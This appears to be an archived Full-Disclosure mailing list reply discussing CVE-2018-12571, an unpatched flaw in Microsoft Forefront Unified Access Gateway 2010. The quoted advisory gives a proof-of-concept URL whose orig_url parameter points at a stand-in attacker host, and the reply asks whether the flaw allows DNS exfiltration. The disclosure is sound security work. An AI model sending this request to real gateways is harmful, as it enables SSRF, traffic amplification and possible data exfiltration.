| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 5 Jul 2018 12:48:06 +0200 From: Thierry Zoller <thierry@...ler.lu> To: fulldisclosure@...lists.org, okancoskun2@...il.com Subject: Re: [FD] Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction Can this be used to perform DNS exfiltration ? (Assuming the UGW is whitelisted to perform DNS (which it likely must be) > # Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External > DNS Interaction > # Vendor Homepage: https://www.microsoft.com/ > # Version: 2010 > # CVE : CVE-2018-12571 > # Proof of Concept #1 > > Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to > trigger outbound DNS queries for arbitrary hosts via a comma-separated list > of URLs in the orig_url parameter, possibly causing a traffic amplification > and/or SSRF outcome. > > /uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/InternalSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&resource%5Fid=8B92B86E36904E2FA83C890F8C864A50&login%5Ftype=0&site%5Fname=test&secure=0&URLHASH=47c74c53%2Dfaae%2D41ae%2D89f1%2D1eb6eff34091&*orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM > <http://2FATTACKER.SITE.COM>%2Ftest* > > # Fixes > > It will not be patched by Microsoft. > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ > > _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists